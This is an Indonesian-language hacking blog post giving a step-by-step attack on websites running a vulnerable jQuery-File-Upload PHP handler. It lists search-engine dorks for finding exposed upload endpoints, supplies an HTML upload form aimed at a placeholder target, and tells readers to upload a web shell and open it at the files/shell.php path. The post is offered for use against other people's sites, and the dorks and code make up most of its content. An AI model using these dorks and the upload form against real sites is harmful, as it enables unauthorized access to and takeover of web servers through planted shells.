Langsung saja no bacot no curhat.
Dork:
Inurl:/assets/global/plugins/jquery-file-upload/
Inurl:/jquery-file-upload/server/php/ intext:{"files":[]}
Inurl:/assets/global/plugins/jquery-file-upload/ intext:index of
Lanjutnya kembangin sendiri. Biar Gak Manja :)
Exploits:
http://www.target.com/assets/global/plugins/jquery-file-upload/server/php/
Jika Vuln Akan tampak seperti dibawah ini
Next
Simpan Kode dibawah ini dengan format .html , Save as tipe "All File"
<form method="POST" action="http://www.target.com/assets/global/plugins/jquery-file-upload/server/php/"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>
Jangan Lupa http://www.target.com ganti dengan target kalian.
Jika sudah buka file tadi lalu upload shell kalian.
Akses shell kalian di http://www.target.com/assets/global/plugins/jquery-file-upload/server/php/files/shell.php
Sekian Dan Terima Gaji :v
0 Komentar